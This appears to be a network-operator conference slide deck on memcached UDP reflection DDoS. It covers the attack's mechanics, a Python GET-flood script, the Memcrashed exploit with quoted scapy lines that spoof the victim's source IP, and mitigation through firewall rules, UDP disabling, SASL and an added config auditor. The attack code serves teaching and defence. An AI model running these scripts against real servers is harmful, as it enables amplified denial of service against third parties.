Memcache as UDP Reflectors: A Massive
Amplified DDoS on the World
(Attack Formulation and Mitigation)
Presenter
Muhammad Morshed Alam
AmberIT Limited
morshed@amberit.com.bd
<Arbor Networks> <Shodan Stats>
Outlines
• Memcache overview
• Memcache Variables and Commands
• Memcache DDoS Amplification Attack formulation,
Amplification Factor
• Memcache DDoS Tools (set and get requests, spoof UDP
packets)
• Mitigation (securing memcache servers using firewall
and SASL authentication)
Memcached Overview
• Free & open source, high-performance, distributed memory object caching system
• Uses key-value pairs to store arbitrary data (strings, objects)
• Set(key, data) <= save the data under key
  Get(key) => return the data stored under key
• add, delete and replace commands to explicitly insert/remove data for a key
• Optimizes backend database performance by temporarily storing information in cache memory
Memcached Mitigates the Load from DB
Speed up the Web App Response
Install Memcache Service
# sudo apt-get update
# sudo apt-get install memcached
# sudo apt-get install libmemcached-tools
Check the running process:
root@bdnog-memcace:~# ps aux |grep memcache
Output:
memcache 207 0.0 0.1 63388 1952 ? Ssl Apr12 0:02
/usr/bin/memcached -m 64 -p 11211 -u memcache -l
127.0.0.1
Install Memcache Service Contd..
Verify open ports with the ss command or netstat
command:
# ss -tulpn | grep :11211
# netstat -tulpn | grep :11211
Configuration file:
# sudo vi /etc/memcached.conf
Service restart process:
# sudo systemctl restart memcached
Memcache Variables and Commands:
Connecting to the Memcache service:
root@bdnog-memcace:~# telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
stats
STAT pid 12476
STAT uptime 20
STAT time 1524726956
STAT version 1.4.25 Ubuntu
STAT libevent 2.0.21-stable
STAT pointer_size 64
STAT rusage_user 0.008000
STAT rusage_system 0.004000
STAT curr_connections 1
STAT total_connections 2
STAT connection_structures 2
STAT reserved_fds 20
STAT cmd_get 0
STAT cmd_set 0
STAT cmd_flush 0
STAT cmd_touch 0
STAT get_hits 0
STAT get_misses 0
STAT delete_misses 0
STAT delete_hits 0
STAT incr_misses 0
STAT incr_hits 0
STAT decr_misses 0
STAT decr_hits 0
STAT cas_misses 0
STAT cas_hits 0
STAT cas_badval 0
STAT touch_hits 0
STAT touch_misses 0
STAT auth_cmds 0
STAT auth_errors 0
STAT bytes_read 7
STAT bytes_written 0
STAT limit_maxbytes 67108864
STAT accepting_conns 1
STAT listen_disabled_num 0
STAT time_in_listen_disabled_us 0
STAT threads 4
STAT conn_yields 0
STAT hash_power_level 16
STAT hash_bytes 524288
STAT hash_is_expanding 0
STAT malloc_fails 0
STAT bytes 0
STAT curr_items 0
STAT total_items 0
STAT expired_unfetched 0
STAT evicted_unfetched 0
STAT evictions 0
STAT reclaimed 0
STAT crawler_reclaimed 0
STAT crawler_items_checked 0
STAT lrutail_reflocked 0
END
Memcache-tools and outputs
# Setting data for a key:
set key 0 3600 16
Welcome to BDNog
STORED
# Getting the value of a key:
get key
VALUE key 0 16
Welcome to BDNog
END
Using the libmemcached-tools commands:
root@bdnog-memcace:~# memcstat --servers 127.0.0.1
Output: the present value of every memcache stats variable, e.g.,
STAT cmd_get 1
STAT cmd_set 1
root@bdnog-memcace:~# memcdump --servers 127.0.0.1
Output: all keys currently holding cached data, e.g.,
Key
root@bdnog-memcace:~# memcat --servers 127.0.0.1 key
Output: the value stored under that key, e.g.,
Welcome to BDNog
set <keyname> <some_flag> <expiration_in_seconds> <length_of_data_to_follow>
Vulnerable Memcached Server
• No authentication required to access it
• Anyone can inject a large payload into the cache without authorization
• Listens on UDP port 11211 and accepts datagrams from any IP address
• UDP is connectionless and unreliable: target hosts receive data they never asked for
Stats of vulnerable memcached services exposed on the Internet (Qrator Labs and Akamai)
1. The attacker finds a vulnerable memcached server listening on UDP port 11211
with a high value of the limit_maxbytes variable
2. Runs a memcached SET command that fills one key to its maximum size,
guaranteeing a large payload
3. Sends many forged GET requests for that key over UDP, with the victim's IP
as the spoofed source
Attacker's UDP packets contain:
• UDP GET key requests
• Size: 15 B, SRC IP: spoofed target IP, DST port: 11211, DST IP: memcached host
Vulnerable memcached servers exposed on the Internet and listening on UDP port 11211
<Victims/Targets>
• GET responses reflected to the victim IP carry the (key, value)
• The returned value is large, i.e., total size = size of (key, value) × number of requests
• 15 B GET request => 750 kB response, 50000x amplification (Akamai report)
• SRC IP: memcached host, DST IP: target, SRC port: 11211
Attack Formulation
1. An attacker may use multiple vulnerable memcached servers against a single
target IP by spoofing the SRC IP
2. The target's network infrastructure is overwhelmed with UDP traffic
Memcache amplification DDoS: bandwidth consumption
Trends of Protocols Used for Reflection
Most DDoS attacks counted were memcached-based (DDoSmon stats)
DDoS attack bandwidth of 1.3 Tbps on GitHub !!!
Memcached Reflection Power
Inserting key value to a vulnerable memcached server:
# apt-get install python-memcache
# python
>>> import memcache
>>> mc=memcache.Client(['1.2.3.4:11211'],debug=True)
>>> mc.set('tot2',3423443534324234234234234)
True
>>> mc.get('tot2')
3423443534324234234234234
Max key value (size) => 1 MB; repeating the GET request 1024 times => 1024 MB (1 GB)
of reflected UDP traffic !!!!
Flooding the resource with Reflected UDP Traffic:
# touch get_flood.py
#!/usr/bin/env python
import memcache
mc = memcache.Client(['202.4.96.85:11211'], debug=True)
mc.set('tot2', 1347534875923423432423)
for i in range(10000):
    mc.get('tot2')
    print i
root@morshed-Lenovo-G40-70:~#python get_flood.py
MemCached: MemCache: inet:202.4.96.85:11211: connect: timed
out. Marking dead.
Dump Packets: (figure: Memcache Server, Get Requests Sender)
Dump Output Packets:
Dump Output Packets (PPS Curve):
Memcached DDoS Tools
Sends forged UDP packets (spoofing the SRC IP as the target IP) to vulnerable
memcached servers found through the Shodan API
# git clone https://github.com/649/Memcrashed-DDoS-Exploit.git
# apt-get install python3
# pip install shodan   ; search engine
# pip install scapy    ; required to craft UDP packets
Pass the API key obtained from https://account.shodan.io/login and enter the
target victim IP address to run the attack
# python3 Memcrashed.py
; "injected" is the key; an arbitrary value is inserted into the cache
setdata = ("\x00\x00\x00\x00\x00\x00\x00\x00set\x00injected\x000\x003600\x00%s\r\n%s\r\n"
getdata = ("\x00\x00\x00\x00\x00\x00\x00\x00get\x00injected\r\n")
; scapy rewrites the SRC IP and sends the get request on behalf of the
victim/target IP
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata))
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata))
Dump Data:
Mitigation
Step-1: Configuring the firewall:
For TCP:
# /sbin/iptables -A INPUT -p tcp -s 172.16.11.0/24 --dport 11211 -j ACCEPT
# /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP
For UDP:
# /sbin/iptables -A INPUT -p udp -s 172.16.11.0/24 --dport 11211 -j ACCEPT
# /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP
Or permanently block it (e.g., on a Zimbra Collaboration host):
# /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP
# /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP
Note: save the iptables rules and check them:
# iptables -L -v -n
Secure memcached server to avoid DDoS amplification attacks
Step-2: Changing the configuration:
# sudo vim /etc/memcached.conf
-l 127.0.0.1,172.16.3.1   ; listen on localhost and the trusted block only
-U 0                      ; disable the UDP listener on port 11211
# sudo systemctl restart memcached
Secure memcached server to avoid DDoS amplification attacks contd...
Validation of filtering rules:
# nc 202.4.96.144 11211
# nc -u 202.4.96.144 11211
# telnet 202.4.96.144 11211
# sudo nmap 202.4.96.144 -p 11211 -sU -sS --script memcached-info
Adding Authorized user using SASL to Memcached Server:
# memcstat --servers="127.0.0.1"
Output:
Server: 127.0.0.1 (11211)
pid: 3831
uptime: 9
time: 1520028517, version: 1.4.25 . . .
SASL adds client authentication to memcached servers.
# sudo vim /etc/memcached.conf
-S ;enable SASL
-vv ;enable verbose output to /var/log/memcached
Save and close the file.
# sudo systemctl restart memcached
# sudo journalctl -u memcached
Output:
Apr 27 22:03:58 memcached systemd-memcached-wrapper[2760]: Initialized SASL.
Adding Authorized user using SASL to Memcached Server:
# sudo apt-get install sasl2-bin ; SASL user database
# sudo mkdir -p /etc/sasl2
# sudo vi /etc/sasl2/memcached.conf
mech_list: plain
log_level: 5
sasldb_path: /etc/sasl2/memcached-sasldb2
# sudo saslpasswd2 -a memcached -c -f /etc/sasl2/memcached-sasldb2 morshed
# sudo systemctl restart memcached
# memcstat --servers="127.0.0.1" --username=morshed --password=*passwd*
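A configuration audit for the hardening steps above (Step-2 bind address and UDP setting, plus the SASL switch), as an added example that is not from the slides or the memcached project: it parses a Debian-style /etc/memcached.conf and reports every setting that still leaves the server usable as a reflector or as an open cache. The sample configs are constructed; treating a missing -U as "UDP enabled" assumes a 1.4.x build like the one on the slides.

```python
"""Audit a Debian-style /etc/memcached.conf for the exposure the slides fix.

Added example, not from the slides or the memcached project. Assumptions: one
'-flag value' option per line as in Debian's memcached.conf; a missing '-U' is
treated as 'UDP enabled', which holds for the 1.4.x build shown on the slides
(1.5.6 and later disable UDP by default). The sample configs are constructed.
"""
import ipaddress
from typing import Dict, List


def parse_memcached_conf(text: str) -> Dict[str, List[str]]:
    """Map each option flag to the values given for it, ignoring comments."""
    opts: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments, keep '-l a,b' style values
        if not line.startswith("-"):
            continue
        parts = line.split(None, 1)
        flag, value = parts[0], (parts[1].strip() if len(parts) > 1 else "")
        opts.setdefault(flag, []).append(value)
    return opts


def audit_memcached_conf(text: str) -> List[str]:
    """One finding per setting that leaves the server a reflector or an open cache."""
    opts = parse_memcached_conf(text)
    findings: List[str] = []

    # UDP/11211 is the reflection vector; '-U 0' turns the listener off.
    if opts.get("-U", [""])[-1] != "0":
        findings.append("UDP listener enabled: add '-U 0' (UDP/11211 is the reflection vector)")

    # '-l' limits which addresses memcached binds to; it may list several, comma-separated.
    binds = [a.strip() for v in opts.get("-l", []) for a in v.split(",") if a.strip()]
    if not binds:
        findings.append("no '-l' bind address: memcached listens on every interface")
    for addr in binds:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            findings.append(f"bind address {addr!r} is not an IP literal; check it resolves internally")
            continue
        if ip.is_unspecified:
            findings.append(f"bound to wildcard {addr}: reachable from any network")
        elif ip.is_global:
            findings.append(f"bound to public address {addr}: restrict with firewall rules or SASL")

    # Without '-S' any client that reaches the port can set and get keys.
    if "-S" not in opts:
        findings.append("SASL disabled: add '-S' so unauthenticated clients cannot set or get keys")
    return findings


# Constructed: a default-style install exposed on all interfaces.
EXPOSED_CONF = """\
# memcached.conf (constructed sample)
-d
logfile /var/log/memcached.log
-m 64
-p 11211
-u memcache
-l 0.0.0.0
"""

# Constructed: the settings the slides apply (trusted bind, UDP off, SASL on).
HARDENED_CONF = """\
-d
-m 64
-p 11211
-u memcache
-l 127.0.0.1,172.16.3.1   # localhost and the trusted block only
-U 0                      # disable the UDP listener
-S                        # require SASL authentication
-vv
"""

if __name__ == "__main__":
    for name, conf in (("exposed", EXPOSED_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_memcached_conf(conf) or ["no findings"])
```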
Memcache as udp traffic reflector

Contenu connexe

Tendances

DPDK in Containers Hands-on Lab
DPDK in Containers Hands-on LabDPDK in Containers Hands-on Lab
DPDK in Containers Hands-on LabMichelle Holley
 
How to configure IPA-Server & Client-Centos 7
How to configure IPA-Server & Client-Centos 7How to configure IPA-Server & Client-Centos 7
How to configure IPA-Server & Client-Centos 7Tola LENG
 
Tonyfortunatoiperfquickstart 1212633021928769-8
Tonyfortunatoiperfquickstart 1212633021928769-8Tonyfortunatoiperfquickstart 1212633021928769-8
Tonyfortunatoiperfquickstart 1212633021928769-8Jamil Jamil
 
在Aix6.1上安装11g r2 rac grid infrastructure集群
在Aix6.1上安装11g r2 rac grid infrastructure集群在Aix6.1上安装11g r2 rac grid infrastructure集群
在Aix6.1上安装11g r2 rac grid infrastructure集群maclean liu
 
Configure DHCP Server and DHCP-Relay
Configure DHCP Server and DHCP-RelayConfigure DHCP Server and DHCP-Relay
Configure DHCP Server and DHCP-RelayTola LENG
 
DNS, DHCP Configuration
DNS, DHCP Configuration DNS, DHCP Configuration
DNS, DHCP Configuration Anik Saha
 
Awrrpt 1 3004_3005
Awrrpt 1 3004_3005Awrrpt 1 3004_3005
Awrrpt 1 3004_3005Kam Chan
 
Hadoop Cluster - Basic OS Setup Insights
Hadoop Cluster - Basic OS Setup InsightsHadoop Cluster - Basic OS Setup Insights
Hadoop Cluster - Basic OS Setup InsightsSruthi Kumar Annamnidu
 
Configure Webserver & SSL secure & redirect in SuSE Linux Enterprise
Configure Webserver & SSL secure & redirect in SuSE Linux EnterpriseConfigure Webserver & SSL secure & redirect in SuSE Linux Enterprise
Configure Webserver & SSL secure & redirect in SuSE Linux EnterpriseTola LENG
 
Open Source Networking with Vyatta
Open Source Networking with VyattaOpen Source Networking with Vyatta
Open Source Networking with VyattaMatthew Turland
 
Debugging linux issues with eBPF
Debugging linux issues with eBPFDebugging linux issues with eBPF
Debugging linux issues with eBPFIvan Babrou
 
How deep is your buffer – Demystifying buffers and application performance
How deep is your buffer – Demystifying buffers and application performanceHow deep is your buffer – Demystifying buffers and application performance
How deep is your buffer – Demystifying buffers and application performanceCumulus Networks
 
Open vpn server_linux
Open vpn server_linuxOpen vpn server_linux
Open vpn server_linuxTola LENG
 
What is new in BIND 9.11?
What is new in BIND 9.11?What is new in BIND 9.11?
What is new in BIND 9.11?Men and Mice
 
Using ngx_lua in UPYUN 2
Using ngx_lua in UPYUN 2Using ngx_lua in UPYUN 2
Using ngx_lua in UPYUN 2Cong Zhang
 

Tendances (19)

DPDK in Containers Hands-on Lab
DPDK in Containers Hands-on LabDPDK in Containers Hands-on Lab
DPDK in Containers Hands-on Lab
 
How to configure IPA-Server & Client-Centos 7
How to configure IPA-Server & Client-Centos 7How to configure IPA-Server & Client-Centos 7
How to configure IPA-Server & Client-Centos 7
 
Tonyfortunatoiperfquickstart 1212633021928769-8
Tonyfortunatoiperfquickstart 1212633021928769-8Tonyfortunatoiperfquickstart 1212633021928769-8
Tonyfortunatoiperfquickstart 1212633021928769-8
 
R bernardino hand_in_assignment_week_1
R bernardino hand_in_assignment_week_1R bernardino hand_in_assignment_week_1
R bernardino hand_in_assignment_week_1
 
在Aix6.1上安装11g r2 rac grid infrastructure集群
在Aix6.1上安装11g r2 rac grid infrastructure集群在Aix6.1上安装11g r2 rac grid infrastructure集群
在Aix6.1上安装11g r2 rac grid infrastructure集群
 
Configure DHCP Server and DHCP-Relay
Configure DHCP Server and DHCP-RelayConfigure DHCP Server and DHCP-Relay
Configure DHCP Server and DHCP-Relay
 
DNS, DHCP Configuration
DNS, DHCP Configuration DNS, DHCP Configuration
DNS, DHCP Configuration
 
Awrrpt 1 3004_3005
Awrrpt 1 3004_3005Awrrpt 1 3004_3005
Awrrpt 1 3004_3005
 
Hadoop Cluster - Basic OS Setup Insights
Hadoop Cluster - Basic OS Setup InsightsHadoop Cluster - Basic OS Setup Insights
Hadoop Cluster - Basic OS Setup Insights
 
Configure Webserver & SSL secure & redirect in SuSE Linux Enterprise
Configure Webserver & SSL secure & redirect in SuSE Linux EnterpriseConfigure Webserver & SSL secure & redirect in SuSE Linux Enterprise
Configure Webserver & SSL secure & redirect in SuSE Linux Enterprise
 
Open Source Networking with Vyatta
Open Source Networking with VyattaOpen Source Networking with Vyatta
Open Source Networking with Vyatta
 
Debugging linux issues with eBPF
Debugging linux issues with eBPFDebugging linux issues with eBPF
Debugging linux issues with eBPF
 
IPTABLES
IPTABLESIPTABLES
IPTABLES
 
How deep is your buffer – Demystifying buffers and application performance
How deep is your buffer – Demystifying buffers and application performanceHow deep is your buffer – Demystifying buffers and application performance
How deep is your buffer – Demystifying buffers and application performance
 
Ceph issue 해결 사례
Ceph issue 해결 사례Ceph issue 해결 사례
Ceph issue 해결 사례
 
Open vpn server_linux
Open vpn server_linuxOpen vpn server_linux
Open vpn server_linux
 
Banv
BanvBanv
Banv
 
What is new in BIND 9.11?
What is new in BIND 9.11?What is new in BIND 9.11?
What is new in BIND 9.11?
 
Using ngx_lua in UPYUN 2
Using ngx_lua in UPYUN 2Using ngx_lua in UPYUN 2
Using ngx_lua in UPYUN 2
 

Similaire à Memcache as udp traffic reflector

Oracle Client Failover - Under The Hood
Oracle Client Failover - Under The HoodOracle Client Failover - Under The Hood
Oracle Client Failover - Under The HoodLudovico Caldara
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalabilityWim Godden
 
SR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/Stable
SR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/StableSR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/Stable
SR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/Stablejuet-y
 
7 hands on
7 hands on7 hands on
7 hands onvideos
 
Monitoring InfluxEnterprise
Monitoring InfluxEnterpriseMonitoring InfluxEnterprise
Monitoring InfluxEnterpriseInfluxData
 
SR-IOV+KVM on Debian/Stable
SR-IOV+KVM on Debian/StableSR-IOV+KVM on Debian/Stable
SR-IOV+KVM on Debian/Stablejuet-y
 
Configure Mikrotik Khmer.pdf
Configure Mikrotik Khmer.pdfConfigure Mikrotik Khmer.pdf
Configure Mikrotik Khmer.pdfBT Digital
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalabilityWim Godden
 
AWS re:Invent 2016: Making Every Packet Count (NET404)
AWS re:Invent 2016: Making Every Packet Count (NET404)AWS re:Invent 2016: Making Every Packet Count (NET404)
AWS re:Invent 2016: Making Every Packet Count (NET404)Amazon Web Services
 
(NET404) Making Every Packet Count
(NET404) Making Every Packet Count(NET404) Making Every Packet Count
(NET404) Making Every Packet CountAmazon Web Services
 
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...NETWAYS
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
CEPH中的QOS技术
CEPH中的QOS技术CEPH中的QOS技术
CEPH中的QOS技术suncbing1
 
Tópicos - LVS Instalacao Slack11
Tópicos - LVS Instalacao Slack11Tópicos - LVS Instalacao Slack11
Tópicos - LVS Instalacao Slack11Luiz Arthur
 
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCPKonfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCPWalid Umar
 
Modul dhcp server menggunakan mikrotik os
Modul dhcp server menggunakan mikrotik osModul dhcp server menggunakan mikrotik os
Modul dhcp server menggunakan mikrotik osEen Pahlefi
 
Cisco asa firewall command line technical guide
Cisco asa firewall command line technical guideCisco asa firewall command line technical guide
Cisco asa firewall command line technical guideMDEMARCOCCIE
 
1.4.2-basic-configuration-with-mikrotik-cli.pdf
1.4.2-basic-configuration-with-mikrotik-cli.pdf1.4.2-basic-configuration-with-mikrotik-cli.pdf
1.4.2-basic-configuration-with-mikrotik-cli.pdfDeivysVargas
 

Similaire à Memcache as udp traffic reflector (20)

Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers
 
Oracle Client Failover - Under The Hood
Oracle Client Failover - Under The HoodOracle Client Failover - Under The Hood
Oracle Client Failover - Under The Hood
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
SR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/Stable
SR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/StableSR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/Stable
SR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/Stable
 
7 hands on
7 hands on7 hands on
7 hands on
 
Monitoring InfluxEnterprise
Monitoring InfluxEnterpriseMonitoring InfluxEnterprise
Monitoring InfluxEnterprise
 
SR-IOV+KVM on Debian/Stable
SR-IOV+KVM on Debian/StableSR-IOV+KVM on Debian/Stable
SR-IOV+KVM on Debian/Stable
 
Configure Mikrotik Khmer.pdf
Configure Mikrotik Khmer.pdfConfigure Mikrotik Khmer.pdf
Configure Mikrotik Khmer.pdf
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
AWS re:Invent 2016: Making Every Packet Count (NET404)
AWS re:Invent 2016: Making Every Packet Count (NET404)AWS re:Invent 2016: Making Every Packet Count (NET404)
AWS re:Invent 2016: Making Every Packet Count (NET404)
 
(NET404) Making Every Packet Count
(NET404) Making Every Packet Count(NET404) Making Every Packet Count
(NET404) Making Every Packet Count
 
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
CEPH中的QOS技术
CEPH中的QOS技术CEPH中的QOS技术
CEPH中的QOS技术
 
Tópicos - LVS Instalacao Slack11
Tópicos - LVS Instalacao Slack11Tópicos - LVS Instalacao Slack11
Tópicos - LVS Instalacao Slack11
 
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCPKonfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
 
Modul dhcp server menggunakan mikrotik os
Modul dhcp server menggunakan mikrotik osModul dhcp server menggunakan mikrotik os
Modul dhcp server menggunakan mikrotik os
 
Cisco asa firewall command line technical guide
Cisco asa firewall command line technical guideCisco asa firewall command line technical guide
Cisco asa firewall command line technical guide
 
1.4.2-basic-configuration-with-mikrotik-cli.pdf
1.4.2-basic-configuration-with-mikrotik-cli.pdf1.4.2-basic-configuration-with-mikrotik-cli.pdf
1.4.2-basic-configuration-with-mikrotik-cli.pdf
 

Plus de Bangladesh Network Operators Group

Accelerating Hyper-Converged Enterprise Virtualization using Proxmox and Ceph
Accelerating Hyper-Converged Enterprise Virtualization using Proxmox and CephAccelerating Hyper-Converged Enterprise Virtualization using Proxmox and Ceph
Accelerating Hyper-Converged Enterprise Virtualization using Proxmox and CephBangladesh Network Operators Group
 
Contents Localization Initiatives to get better User Experience
Contents Localization Initiatives to get better User ExperienceContents Localization Initiatives to get better User Experience
Contents Localization Initiatives to get better User ExperienceBangladesh Network Operators Group
 
Re-define network visibility for capacity planning & forecasting with Grafana
Re-define network visibility for capacity planning & forecasting with GrafanaRe-define network visibility for capacity planning & forecasting with Grafana
Re-define network visibility for capacity planning & forecasting with GrafanaBangladesh Network Operators Group
 

Plus de Bangladesh Network Operators Group (20)

Accelerating Hyper-Converged Enterprise Virtualization using Proxmox and Ceph
Accelerating Hyper-Converged Enterprise Virtualization using Proxmox and CephAccelerating Hyper-Converged Enterprise Virtualization using Proxmox and Ceph
Accelerating Hyper-Converged Enterprise Virtualization using Proxmox and Ceph
 
Recent IRR changes by Yoshinobu Matsuzaki, IIJ
Recent IRR changes by Yoshinobu Matsuzaki, IIJRecent IRR changes by Yoshinobu Matsuzaki, IIJ
Recent IRR changes by Yoshinobu Matsuzaki, IIJ
 
Fact Sheets : Network Status in Bangladesh
Fact Sheets : Network Status in BangladeshFact Sheets : Network Status in Bangladesh
Fact Sheets : Network Status in Bangladesh
 
AI Driven Wi-Fi for the Bottom of the Pyramid
AI Driven Wi-Fi for the Bottom of the PyramidAI Driven Wi-Fi for the Bottom of the Pyramid
AI Driven Wi-Fi for the Bottom of the Pyramid
 
IPv6 Security Overview by QS Tahmeed, APNIC RCT
IPv6 Security Overview by QS Tahmeed, APNIC RCTIPv6 Security Overview by QS Tahmeed, APNIC RCT
IPv6 Security Overview by QS Tahmeed, APNIC RCT
 
Network eWaste : Community role to manage end of life Product
Network eWaste : Community role to manage end of life ProductNetwork eWaste : Community role to manage end of life Product
Network eWaste : Community role to manage end of life Product
 
A plenarily integrated SIEM solution and it’s Deployment
A plenarily integrated SIEM solution and it’s DeploymentA plenarily integrated SIEM solution and it’s Deployment
A plenarily integrated SIEM solution and it’s Deployment
 
IPv6 Deployment in South Asia 2022
IPv6 Deployment in South Asia  2022IPv6 Deployment in South Asia  2022
IPv6 Deployment in South Asia 2022
 
Introduction to Software Defined Networking (SDN)
Introduction to Software Defined Networking (SDN)Introduction to Software Defined Networking (SDN)
Introduction to Software Defined Networking (SDN)
 
RPKI Deployment Status in Bangladesh
RPKI Deployment Status in BangladeshRPKI Deployment Status in Bangladesh
RPKI Deployment Status in Bangladesh
 
An Overview about open UDP Services
An Overview about open UDP ServicesAn Overview about open UDP Services
An Overview about open UDP Services
 
12 Years in DNS Security As a Defender
12 Years in DNS Security As a Defender12 Years in DNS Security As a Defender
12 Years in DNS Security As a Defender
 
Contents Localization Initiatives to get better User Experience
Contents Localization Initiatives to get better User ExperienceContents Localization Initiatives to get better User Experience
Contents Localization Initiatives to get better User Experience
 
BdNOG-20220625-MT-v6.0.pptx
BdNOG-20220625-MT-v6.0.pptxBdNOG-20220625-MT-v6.0.pptx
BdNOG-20220625-MT-v6.0.pptx
 
Route Leak Prevension with BGP Community
Route Leak Prevension with BGP CommunityRoute Leak Prevension with BGP Community
Route Leak Prevension with BGP Community
 
Tale of a New Bangladeshi NIX
Tale of a New Bangladeshi NIXTale of a New Bangladeshi NIX
Tale of a New Bangladeshi NIX
 
MANRS for Network Operators
MANRS for Network OperatorsMANRS for Network Operators
MANRS for Network Operators
 
Re-define network visibility for capacity planning & forecasting with Grafana
Re-define network visibility for capacity planning & forecasting with GrafanaRe-define network visibility for capacity planning & forecasting with Grafana
Re-define network visibility for capacity planning & forecasting with Grafana
 
RPKI ROA updates
RPKI ROA updatesRPKI ROA updates
RPKI ROA updates
 
Blockchain Demystified
Blockchain DemystifiedBlockchain Demystified
Blockchain Demystified
 

Dernier

How to login to Router net ORBI LOGIN...
How to login to Router net ORBI LOGIN...How to login to Router net ORBI LOGIN...
How to login to Router net ORBI LOGIN...rrouter90
 
IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119APNIC
 
Company Snapshot Theme for Business by Slidesgo.pptx
Company Snapshot Theme for Business by Slidesgo.pptxCompany Snapshot Theme for Business by Slidesgo.pptx
Company Snapshot Theme for Business by Slidesgo.pptxMario
 
Cybersecurity Threats and Cybersecurity Best Practices
Cybersecurity Threats and Cybersecurity Best PracticesCybersecurity Threats and Cybersecurity Best Practices
Cybersecurity Threats and Cybersecurity Best PracticesLumiverse Solutions Pvt Ltd
 
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...
Summary  ID-IGF 2016 National Dialogue  - English (tata kelola internet / int...Summary  ID-IGF 2016 National Dialogue  - English (tata kelola internet / int...
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...ICT Watch - Indonesia
 
TRENDS Enabling and inhibiting dimensions.pptx
TRENDS Enabling and inhibiting dimensions.pptxTRENDS Enabling and inhibiting dimensions.pptx
TRENDS Enabling and inhibiting dimensions.pptxAndrieCagasanAkio
 
Unidad 4 – Redes de ordenadores (en inglés).pptx
Unidad 4 – Redes de ordenadores (en inglés).pptxUnidad 4 – Redes de ordenadores (en inglés).pptx
Unidad 4 – Redes de ordenadores (en inglés).pptxmibuzondetrabajo
 
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...vmzoxnx5
 
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
Summary  IGF 2013 Bali - English (tata kelola internet / internet governance)Summary  IGF 2013 Bali - English (tata kelola internet / internet governance)
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)ICT Watch - Indonesia
 

Dernier (9)

How to login to Router net ORBI LOGIN...
How to login to Router net ORBI LOGIN...How to login to Router net ORBI LOGIN...
How to login to Router net ORBI LOGIN...
 
IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119
 
Company Snapshot Theme for Business by Slidesgo.pptx
